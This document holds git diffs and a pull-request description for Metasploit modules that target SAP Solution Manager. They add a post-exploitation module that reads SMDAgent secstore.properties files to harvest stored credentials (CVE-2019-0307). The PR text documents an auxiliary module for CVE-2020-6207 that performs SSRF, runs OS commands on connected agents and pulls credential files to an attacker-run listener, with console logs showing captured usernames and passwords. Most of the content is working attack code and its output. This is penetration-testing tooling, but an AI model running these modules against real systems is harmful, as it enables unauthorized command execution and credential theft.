     print_status("Enable EEM on agent: #{@agent_name}")
@@ -245,7 +239,6 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def action_secstore
-    setup_xml_and_variables
     agent = check_agent(@agent_name)
 
     print_status("Enable EEM on agent: #{@agent_name}")
@@ -254,7 +247,7 @@ class MetasploitModule < Msf::Auxiliary
     start_service(
       {
         'Uri' => {
-          'Proc' => proc { |cli, req| on_request_uri(cli, req, @script_name) },
+          'Proc' => proc { |cli, req| on_request_uri(cli, req) },
           'Path' => "/#{@script_name}"
         }
       }

--- a/modules/post/multi/sap/smdagent_get_properties.rb
+++ b/modules/post/multi/sap/smdagent_get_properties.rb
@@ -128,7 +128,7 @@ class MetasploitModule < Msf::Post
           when /pwd/
             sld_password = property[:value]
           end
-        elsif property[:name] =~ %r{smd/}
+        elsif property[:name].include?('smd/')
           case property[:name]
           when /User/
             smd_username = property[:value]

--- a/modules/post/multi/sap/smdagent_get_properties.rb
+++ b/modules/post/multi/sap/smdagent_get_properties.rb
@@ -35,8 +35,8 @@ class MetasploitModule < Msf::Post
         'Platform' => %w[bsd linux osx unix win],
         'SessionTypes' => %w[meterpreter shell],
         'References' => [
-          %w[CVE 2019-0307],
-          %w[URL https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf]
+          [ 'CVE', '2019-0307' ],
+          [ 'URL', 'https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf' ]
         ]
       )
     )
@@ -216,17 +216,6 @@ class MetasploitModule < Msf::Post
           refs: references
         )
       end
-    end
-  end
-
-  def check_addr addr
-    case addr
-    when String
-      IPAddr.new addr
-    when IPAddr
-      addr
-    else
-      raise ArgumentError, "Wrong address format: #{addr}"
     end
   end
 

--- a/modules/post/multi/sap/smdagent_get_properties.rb
+++ b/modules/post/multi/sap/smdagent_get_properties.rb
@@ -142,7 +142,7 @@ class MetasploitModule < Msf::Post
       if !sld_protocol.nil? || !sld_hostname.nil? || !sld_port.nil? || !sld_username.nil? || !sld_password.nil?
         print_line
         print_status('SLD properties:')
-        unless sld_protocol.nil? then print_status("SLD protocol: #{sld_protocol}") end
+        print_status("SLD protocol: #{sld_protocol}") unless sld_protocol.nil?
         unless sld_hostname.nil?
           print_status("SLD hostname: #{sld_hostname}")
           if meterpreter

--- a/modules/post/multi/sap/smdagent_get_properties.rb
+++ b/modules/post/multi/sap/smdagent_get_properties.rb
@@ -167,9 +167,9 @@ class MetasploitModule < Msf::Post
       if !smd_url.nil? || !smd_username.nil? || !smd_password.nil?
         print_line
         print_status('SMD properties:')
-        unless smd_url.nil? then print_status("SMD url: #{smd_url}") end
-        unless smd_username.nil? then print_good("SMD username: #{smd_username}") end
-        unless smd_password.nil? then print_good("SMD password: #{smd_password}") end
+        print_status("SMD url: #{smd_url}") unless smd_url.nil?
+        print_good("SMD username: #{smd_username}") unless smd_username.nil?
+        print_good("SMD password: #{smd_password}") unless smd_password.nil?
       end
 
       # Store decoded credentials, report service and vuln

--- a/modules/post/multi/sap/smdagent_get_properties.rb
+++ b/modules/post/multi/sap/smdagent_get_properties.rb
@@ -121,7 +121,7 @@ class MetasploitModule < Msf::Post
 
       # Parse secstore.properties file
       secstore_properties.each do |property|
-        if property[:name] =~ %r{sld/}
+        if property[:name].include?('sld/')
           case property[:name]
           when /usr/
             sld_username = property[:value]

--- a/modules/post/multi/sap/smdagent_get_properties.rb
+++ b/modules/post/multi/sap/smdagent_get_properties.rb
@@ -102,7 +102,7 @@ class MetasploitModule < Msf::Post
 
       # Parse runtime.properties file
       runtime_properties.each do |property|
-        if property[:name] =~ /sld\./
+        if property[:name].include?('sld.')
           case property[:name]
           when /hostprotocol/
             sld_protocol = property[:value]

--- a/modules/post/multi/sap/smdagent_get_properties.rb
+++ b/modules/post/multi/sap/smdagent_get_properties.rb
@@ -24,8 +24,8 @@ class MetasploitModule < Msf::Post
         info,
         'Name' => 'Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server',
         'Description' => %q{
-          If a SMDAgent has CVE-2019-0307 vulnerability, attackers can obtain its secstore.properties configuration file,
-          which contains the credentials for the SAP Solution Manager server to which this SMDAgent is connected.
+          This module retrieves the `secstore.properties` file on a SMDAgent. This file contains the credentials
+          used by the SMDAgent to connect to the SAP Solution Manager server.
         },
         'License' => MSF_LICENSE,
         'Author' => [

--- a/modules/post/multi/sap/smdagent_get_properties.rb
+++ b/modules/post/multi/sap/smdagent_get_properties.rb
@@ -111,7 +111,7 @@ class MetasploitModule < Msf::Post
           when /hostport/
             sld_port = property[:value]
           end
-        elsif property[:name] =~ /smd\./
+        elsif property[:name].include?('smd.')
           case property[:name]
           when /url/
             smd_url = property[:value].gsub(/\\:/, ':')

--- a/modules/post/multi/sap/smdagent_get_properties.rb
+++ b/modules/post/multi/sap/smdagent_get_properties.rb
@@ -158,9 +158,9 @@ class MetasploitModule < Msf::Post
             end
           end
         end
-        unless sld_port.nil? then print_status("SLD port: #{sld_port}") end
-        unless sld_username.nil? then print_good("SLD username: #{sld_username}") end
-        unless sld_password.nil? then print_good("SLD password: #{sld_password}") end
+        print_status("SLD port: #{sld_port}") unless sld_port.nil?
+        print_good("SLD username: #{sld_username}") unless sld_username.nil?
+        print_good("SLD password: #{sld_password}") unless sld_password.nil?
       end
 
       # Print SMD properties

--- a/modules/post/multi/sap/smdagent_get_properties.rb
+++ b/modules/post/multi/sap/smdagent_get_properties.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Post
       instances = list_dir(UNIX_PREFIX, windows, meterpreter)
     end
 
-    if (instances == '') || instances.nil? || instances.empty?
+    if instances.nil? || instances.empty?
       fail_with(Failure::NotFound, 'SAP root directory not found')
     end
 

--- a/modules/post/multi/sap/smdagent_get_properties.rb
+++ b/modules/post/multi/sap/smdagent_get_properties.rb
@@ -1,0 +1,302 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'resolv'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Exploit::Local::SapSmdAgentUnencryptedProperty
+
+  SECSTORE_FILE = 'secstore.properties'.freeze
+  RUNTIME_FILE = 'runtime.properties'.freeze
+
+  WIN_PREFIX = 'c:\\usr\\sap\\DAA\\'.freeze
+  UNIX_PREFIX = '/usr/sap/DAA/'.freeze
+
+  WIN_SUFFIX = '\\SMDAgent\\configuration\\'.freeze
+  UNIX_SUFFIX = '/SMDAgent/configuration/'.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server',
+        'Description' => %q{
+          If a SMDAgent has CVE-2019-0307 vulnerability, attackers can obtain its secstore.properties configuration file,
+          which contains the credentials for the SAP Solution Manager server to which this SMDAgent is connected.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Yvan Genuer', # @_1ggy The researcher who originally found this vulnerability
+          'Vladimir Ivanov' # @_generic_human_ This Metasploit module
+        ],
+        'Platform' => %w[bsd linux osx unix win],
+        'SessionTypes' => %w[meterpreter shell],
+        'References' => [
+          %w[CVE 2019-0307],
+          %w[URL https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf]
+        ]
+      )
+    )
+  end
+
+  def run
+    case session.type
+    when 'meterpreter'
+      meterpreter = true
+    else
+      meterpreter = false
+    end
+    case session.platform
+    when 'windows'
+      windows = true
+      instances = list_dir(WIN_PREFIX, windows, meterpreter)
+    else
+      windows = false
+      instances = list_dir(UNIX_PREFIX, windows, meterpreter)
+    end
+
+    if (instances == '') || instances.nil? || instances.empty?
+      fail_with(Failure::NotFound, 'SAP root directory not found')
+    end
+
+    instances.each do |instance|
+      next if instance == 'SYS'
+
+      next if instance.include? ' '
+
+      next if instance.include? '.'
+
+      next if instance.include? 'tmp'
+
+      if windows
+        runtime_properties_file_name = "#{WIN_PREFIX}#{instance}#{WIN_SUFFIX}#{RUNTIME_FILE}"
+        secstore_properties_file_name = "#{WIN_PREFIX}#{instance}#{WIN_SUFFIX}#{SECSTORE_FILE}"
+      else
+        runtime_properties_file_name = "#{UNIX_PREFIX}#{instance}#{UNIX_SUFFIX}#{RUNTIME_FILE}"
+        secstore_properties_file_name = "#{UNIX_PREFIX}#{instance}#{UNIX_SUFFIX}#{SECSTORE_FILE}"
+      end
+
+      runtime_properties = parse_properties_file(runtime_properties_file_name, windows, meterpreter)
+      secstore_properties = parse_properties_file(secstore_properties_file_name, windows, meterpreter)
+
+      next if runtime_properties.empty?
+
+      print_line
+      print_status("Instance: #{instance}")
+      print_status("Runtime properties file name: #{runtime_properties_file_name}")
+      print_status("Secstore properties file name: #{secstore_properties_file_name}")
+
+      sld_protocol = nil
+      sld_hostname = nil
+      sld_address = nil
+      sld_port = nil
+      sld_username = nil
+      sld_password = nil
+
+      smd_url = nil
+      smd_username = nil
+      smd_password = nil
+
+      # Parse runtime.properties file
+      runtime_properties.each do |property|
+        if property[:name] =~ /sld\./
+          case property[:name]
+          when /hostprotocol/
+            sld_protocol = property[:value]
+          when /hostname/
+            sld_hostname = property[:value]
+          when /hostport/
+            sld_port = property[:value]
+          end
+        elsif property[:name] =~ /smd\./
+          case property[:name]
+          when /url/
+            smd_url = property[:value].gsub(/\\:/, ':')
+          end
+        end
+      end
+
+      # Parse secstore.properties file
+      secstore_properties.each do |property|
+        if property[:name] =~ %r{sld/}
+          case property[:name]
+          when /usr/
+            sld_username = property[:value]
+          when /pwd/
+            sld_password = property[:value]
+          end
+        elsif property[:name] =~ %r{smd/}
+          case property[:name]
+          when /User/
+            smd_username = property[:value]
+          when /Password/
+            smd_password = property[:value]
+          end
+        end
+      end
+
+      # Print SLD properties
+      if !sld_protocol.nil? || !sld_hostname.nil? || !sld_port.nil? || !sld_username.nil? || !sld_password.nil?
+        print_line
+        print_status('SLD properties:')
+        unless sld_protocol.nil? then print_status("SLD protocol: #{sld_protocol}") end
+        unless sld_hostname.nil?
+          print_status("SLD hostname: #{sld_hostname}")
+          if meterpreter
+            if sld_hostname =~ Resolv::IPv4::Regex
+              sld_address = sld_hostname
+            else
+              begin
+                sld_address = session.net.resolve.resolve_host(sld_hostname)[:ip]
+                print_status("SLD address: #{sld_address}")
+              rescue Rex::Post::Meterpreter::RequestError
+                print_error("Failed to resolve SLD hostname: #{sld_hostname}")
+              end
+            end
+          end
+        end
+        unless sld_port.nil? then print_status("SLD port: #{sld_port}") end
+        unless sld_username.nil? then print_good("SLD username: #{sld_username}") end
+        unless sld_password.nil? then print_good("SLD password: #{sld_password}") end
+      end
+
+      # Print SMD properties
+      if !smd_url.nil? || !smd_username.nil? || !smd_password.nil?
+        print_line
+        print_status('SMD properties:')
+        unless smd_url.nil? then print_status("SMD url: #{smd_url}") end
+        unless smd_username.nil? then print_good("SMD username: #{smd_username}") end
+        unless smd_password.nil? then print_good("SMD password: #{smd_password}") end
+      end
+
+      # Store decoded credentials, report service and vuln
+      print_line
+      if sld_username.nil? || sld_password.nil?
+        print_error("File #{secstore_properties_file_name} read, but this file is likely encrypted or does not contain credentials. This SMDAgent is likely patched.")
+      else
+        # Store decoded credentials
+        print_good('Store decoded credentials for SolMan server')
+        if sld_address.nil? || sld_port.nil?
+          service_data = {}
+        else
+          service_data = {
+            origin_type: :service,
+            address: sld_address,
+            port: sld_port,
+            service_name: 'http',
+            protocol: 'tcp'
+          }
+          # Report service
+          report_service(
+            host: sld_address,
+            port: sld_port,
+            name: 'http',
+            proto: 'tcp',
+            info: 'SAP Solution Manager'
+          )
+        end
+        store_valid_credential(
+          user: sld_username,
+          private: sld_password,
+          private_type: :password,
+          service_data: service_data
+        )
+        # Report vulnerability
+        if meterpreter
+          agent_host = Rex::Socket.getaddress(session.sock.peerhost, true)
+        else
+          agent_host = session.session_host
+        end
+        report_vuln(
+          host: agent_host,
+          name: name,
+          refs: references
+        )
+      end
+    end
+  end
+
+  def check_addr addr
+    case addr
+    when String
+      IPAddr.new addr
+    when IPAddr
+      addr
+    else
+      raise ArgumentError, "Wrong address format: #{addr}"
+    end
+  end
+
+  def list_dir(directory, is_windows, is_meterpreter)
+    if is_meterpreter
+      directories = session.fs.dir.foreach(directory).to_a
+    else
+      if is_windows
+        command = "dir #{directory}"
+      else
+        command = "ls #{directory}"
+      end
+      directories = session.shell_command(command).split("\n")
+    end
+    directories
+  end
+
+  def read_file(filename, is_windows, is_meterpreter)
+    if is_meterpreter
+      file_content = session.fs.file.open(filename).read
+    else
+      if is_windows
+        command = "more #{filename}"
+      else
+        command = "cat #{filename}"
+      end
+      file_content = session.shell_command(command)
+    end
+    file_content
+  end
+
+  def file_exist(filename, is_windows, is_meterpreter)
+    if is_meterpreter
+      exist = session.fs.file.exist?(filename)
+    else
+      if is_windows
+        command = "more #{filename}"
+      else
+        command = "stat #{filename}"
+      end
+      stat = session.shell_command(command)
+      if stat =~ /(no such file|cannot access file)/
+        exist = false
+      else
+        exist = true
+      end
+    end
+    exist
+  end
+
+  def parse_properties_file(filename, is_windows, is_meterpreter)
+    properties = []
+    if file_exist(filename, is_windows, is_meterpreter)
+      properties_content = read_file(filename, is_windows, is_meterpreter)
+      if properties_content.nil?
+        print_error("Failed to read properties file: #{filename}")
+      else
+        if is_meterpreter
+          agent_host = Rex::Socket.getaddress(session.sock.peerhost, true)
+        else
+          agent_host = session.session_host
+        end
+        loot = store_loot('smdagent.properties', 'text/plain', agent_host, properties_content, filename, 'SMD Agent properties file')
+        print_good("File #{filename} saved in: #{loot}")
+        properties = parse_properties(properties_content)
+      end
+    else
+      print_error("File: #{filename} does not exist")
+    end
+    properties
+  end
+
+end


### PR DESCRIPTION
# Add post module for CVE-2019-0307

## About
This module exploits the CVE-2019-0307 vulnerability. Any SMDAgent system with a `shell` or `meterpreter` session. 
Attackers can obtain secstore.properties file, which contains the credentials for the SAP Solution Manager server 
to which this SMDAgent is connected.

## Verification Steps

1. Get a `shell` or `meterpreter` session on some host.
2. Do: ```use post/multi/sap/smdagent_get_properties```
3. Do: ```set SESSION [SESSION_ID]```, replacing ```[SESSION_ID]``` with the session number you wish to run this one.
4. Do: ```run```
5. If the system has configuration files containing unencrypted credentials for the SAP Solution Manager server, they will be printed out.

## Options

None.

## Scenarios

```
msf6 post(multi/sap/smdagent_get_properties) > sessions

Active sessions
===============

  Id  Name  Type                     Information                             Connection
  --  ----  ----                     -----------                             ----------
  1         shell linux              SSH daaadm:TestPass1 (172.16.30.14:22)  192.168.50.2:58316 -> 172.16.30.14:22 (172.16.30.14)
  2         meterpreter x64/windows  SAP731\Administrator @ SAP731           0.0.0.0:0 -> 172.16.30.80:4444 (172.16.30.80)

msf6 post(multi/sap/smdagent_get_properties) > set SESSION 1
SESSION => 1
msf6 post(multi/sap/smdagent_get_properties) > run

[+] File /usr/sap/DAA/SMDA98/SMDAgent/configuration/runtime.properties saved in: /Users/vladimir/.msf4/loot/20210329205801_SAP_TEST_172.16.30.14_smdagent.propert_457968.txt
[+] File /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties saved in: /Users/vladimir/.msf4/loot/20210329205811_SAP_TEST_172.16.30.14_smdagent.propert_587689.txt

[*] Instance: SMDA98
[*] Runtime properties file name: /usr/sap/DAA/SMDA98/SMDAgent/configuration/runtime.properties
[*] Secstore properties file name: /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties

[*] SLD properties:
[*] SLD protocol: http
[*] SLD hostname: solman.corp.test.com
[*] SLD port: 50000
[+] SLD username: j2ee_admin
[+] SLD password: asdQWE123

[*] SMD properties:
[*] SMD url: p4://172.16.30.46:50004
[+] SMD username: j2ee_admin
[+] SMD password: asdQWE123

[+] Store decoded credentials for SolMan server
[*] Post module execution completed
msf6 post(multi/sap/smdagent_get_properties) > set SESSION 2
SESSION => 2
msf6 post(multi/sap/smdagent_get_properties) > run

[+] File c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\runtime.properties saved in: /Users/vladimir/.msf4/loot/20210329205823_SAP_TEST_172.16.30.80_smdagent.propert_357417.txt
[+] File c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\secstore.properties saved in: /Users/vladimir/.msf4/loot/20210329205823_SAP_TEST_172.16.30.80_smdagent.propert_604626.txt

[*] Instance: SMDA97
[*] Runtime properties file name: c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\runtime.properties
[*] Secstore properties file name: c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\secstore.properties

[*] SLD properties:
[*] SLD protocol: http
[*] SLD hostname: 172.16.30.46
[*] SLD port: 50000
[+] SLD username: SLDDSUSER
[+] SLD password: asdQWE123

[*] SMD properties:
[*] SMD url: p4://172.16.30.46:50004
[+] SMD username: j2ee_admin
[+] SMD password: asdQWE123

[+] Store decoded credentials for SolMan server
[*] Post module execution completed
msf6 post(multi/sap/smdagent_get_properties) > creds
Credentials
===========

host           origin         service           public      private    realm  private_type  JtR Format
----           ------         -------           ------      -------    -----  ------------  ----------
172.16.30.100  172.16.30.100  50000/tcp (http)  j2ee_admin  asdQWE123         Password
172.16.30.100  172.16.30.100  50000/tcp (http)  SLDDSUSER   asdQWE123         Password

msf6 post(multi/sap/smdagent_get_properties) > services
Services
========

host           port   proto  name  state  info
----           ----   -----  ----  -----  ----
172.16.30.46   50000  tcp    soap  open   SAP Solution Manager

msf6 post(multi/sap/smdagent_get_properties) > vulns

Vulnerabilities
===============

Timestamp                Host          Name                                                       References
---------                ----          ----                                                       ----------
2021-03-29 17:58:11 UTC  172.16.30.14  Diagnostics Agent in Solution Manager, stores unencrypted  CVE-2019-0307,URL-https://conference.hitb.org/hitblockdown
                                        credentials for Solution Manager server                   002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who
                                                                                                  %20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
2021-03-29 17:58:23 UTC  172.16.30.80  Diagnostics Agent in Solution Manager, stores unencrypted  CVE-2019-0307,URL-https://conference.hitb.org/hitblockdown
                                        credentials for Solution Manager server                   002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who
                                                                                                  %20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf

```


# Add action SECTORE in auxiliary module cve_2020_6207_solman_rce.rb

## About
This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (`tc~smd~agent~application~eem`) of
SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication
checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents,
send HTTP request (SSRF), and execute OS commands on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8.

Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute OS commands from the agent connected
to SolMan as a user from which the SMDAgent service starts, usually the daaadm.

If a connected SMDAgent has CVE-2019-0307 vulnerability, unauthenticated remote attackers can obtain its 
secstore.properties file, which contains the credentials for the SAP Solution Manager server to which this SMDAgent is connected.

## Verification Steps
1. Start msfconsole
1. Do: `workspace [WORKSPACE]`
1. Do: `use auxiliary/admin/sap/sap_2020_6207_solman_rce`
1. Do: `set RHOSTS [IP]`
1. Do: `set action LIST`
1. Do: `run`
1. Verify that a list of connected agents was returned.
1. Do: `set AGENT [Connected agent server name]`
1. Do: `set SSRF_METHOD [GET, POST, PUT, DELETE, PATCH, ...]`
1. Do: `set SSRF_URI [SSRF uri, example - http://1.1.1.1/test.html]`
1. Do: `set action SSRF`
1. Do: `run`
1. Verify that the HTTP request from the connected agent has been sent.
1. Do: `set AGENT [Connected agent server name]`
1. Do: `set COMMAND [OS command, example - ping -c 4 1.1.1.1]`
1. Do: `set action EXEC`
1. Do: `run`
1. Verify that the OS command has been executed on the connected agent.
1. Do: `set AGENT [Connected agent server name]`
1. Do: `set SRVHOST [Local IP]`
1. Do: `set action SECSTORE`
1. Do: `run`
1. Verify that the credentials for Solution Manager have been obtained.

## Options

### TARGETURI

This is the path to the EEM admin page of the SolMan that is vulnerable to CVE-2020-6207.
By default, it is set to `/EemAdminService/EemAdmin`. However, it can be changed if SolMan
was installed at a path different from that of the web root. For example, if the SolMan
server was proxied to the `/solman/` path under the web root, then this value would be
set to `/solman/EemAdminService/EemAdmin`.

### AGENT

Connected agent sever name.
Example: `linux_agent`

### SSRF_METHOD

HTTP method for sending HTTP request from a connected agent, the server name of which is specified in the `AGENT` option.
Example: `GET`

### SSRF_URI

URI for sending HTTP requests from a connected agent, the server name of which is specified in the `AGENT` option.
Example: `http://1.1.1.1/test.html`

### COMMAND

OS command for executing in connected agent, the server name of which is specified in the `AGENT` option.
Example: `ping -c 4 1.1.1.1`

### SRVHOST

The local IP address to listen HTTP requests from agent, the server name of which is specified in the `AGENT` option.
Example: `192.168.1.1`

### SRVPORT

The local port to listen HTTP requests from agent, the server name of which is specified in the `AGENT` option.
Example: `8000`

## Actions
```
   Name      Description
   ----      -----------
   EXEC      Exec OS command on connected agent
   LIST      List connected agents
   SECSTORE  Get file with SolMan credentials from connected agent
   SSRF      Send SSRF from connected agent
```

## Scenarios

### Vulnerable SolMan 7.2 running on agent: test_linux with OS: Linux and java version: 1.8

```
msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use auxiliary/admin/sap/cve_2020_6207_solman_rce
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION LIST
ACTION => LIST
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set RHOST 172.16.30.46
RHOST => 172.16.30.46
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
[*] Running module against 172.16.30.46

[*] Getting a list of agents connected to the Solution Manager: 172.16.30.46
[+] Successfully retrieved agent list:
Connected Agents List
=====================

 Server Name   Host Name              Instance Name  OS Name                 Java Version
 -----------   ---------              -------------  -------                 ------------
 test_windows  sap731.corp.test.com   SMDA97         Windows Server 2008 R2  1.6.0_29
 test_linux    saperp7.corp.test.com  SMDA98         Linux                   1.8.0_25

[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION SSRF
ACTION => SSRF
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set AGENT test_linux
AGENT => test_linux
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set SSRF_METHOD PUT
SSRF_METHOD => PUT
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set SSRF_URI http://192.168.50.3:7777/
SSRF_URI => http://192.168.50.3:7777/
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
[*] Running module against 172.16.30.46

[*] Enable EEM on agent: test_linux
[*] Start script: IqsDdgpc5Iwu with SSRF payload on agent: test_linux
[*] Stop script: IqsDdgpc5Iwu on agent: test_linux
[*] Delete script: IqsDdgpc5Iwu on agent: test_linux
[+] Send SSRF: 'PUT http://192.168.50.3:7777/ HTTP/1.1' from agent: test_linux
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION EXEC
ACTION => EXEC
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set AGENT test_linux
AGENT => test_linux
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set COMMAND ping -c 4 192.168.50.3
COMMAND => ping -c 4 192.168.50.3
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
[*] Running module against 172.16.30.46

[*] Enable EEM on agent: test_linux
[*] Start script: Lu5BnHgzVehn with RCE payload on agent: test_linux
[*] Stop script: Lu5BnHgzVehn on agent: test_linux
[*] Delete script: Lu5BnHgzVehn on agent: test_linux
[+] Execution command: 'ping -c 4 192.168.50.3' on agent: test_linux
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION SECSTORE
ACTION => SECSTORE
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set AGENT test_linux
AGENT => test_linux
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set SRVHOST 192.168.50.3
SRVHOST => 192.168.50.3
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
[*] Running module against 172.16.30.46

[*] Enable EEM on agent: test_linux
[*] Using URL: http://192.168.50.3:8000/ginMlA2izrNi
[*] Start script: ginMlA2izrNi with payload for retrieving SolMan credentials file from agent: test_linux
[*] Received HTTP request from agent test_linux - 172.16.30.14
[+] Successfully retrieved file /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties from agent: test_linux saved in: /Users/vladimir/.msf4/loot/20210327204344_SAP_TEST_172.16.30.14_smdagent.secstor_025841.txt
[+] Successfully encoded credentials for SolMan server: 172.16.30.46:50000 from agent: test_linux - 172.16.30.14
[+] Username: j2ee_admin
[+] Password: DefaultPass
[*] Stop script: ginMlA2izrNi on agent: test_linux
[*] Delete script: ginMlA2izrNi on agent: test_linux
[*] Server stopped.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > creds
Credentials
===========

host          origin        service           public      private      realm  private_type  JtR Format
----          ------        -------           ------      -------      -----  ------------  ----------
172.16.30.46  172.16.30.46  50000/tcp (soap)  j2ee_admin  DefaultPass         Password

msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > services
Services
========

host          port   proto  name  state  info
----          ----   -----  ----  -----  ----
172.16.30.46  50000  tcp    soap  open   SAP Solution Manager

msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > vulns

Vulnerabilities
===============

Timestamp                Host          Name                                                                                               References
---------                ----          ----                                                                                               ----------
2021-03-27 17:49:37 UTC  172.16.30.46  SAP Solution Manager remote unauthorized OS commands execution                                     CVE-2020-6207,URL-https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf,URL-https://github.com/chipik/SAP_EEM_CVE-2020-6207
2021-03-27 17:49:41 UTC  172.16.30.14  Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server  CVE-2019-0307,URL-https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf

msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > loot

Loot
====

host          service  type                          name                                                            content     info                                path
----          -------  ----                          ----                                                            -------     ----                                ----
172.16.30.14           smdagent.secstore.properties  /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties  text/plain  SMD Agent secstore.properties file  /Users/vladimir/.msf4/loot/a228e5f820edc34bc767-20210327204941_SAP_TEST_172.16.30.14_smdagent.secstor_283920.txt

```
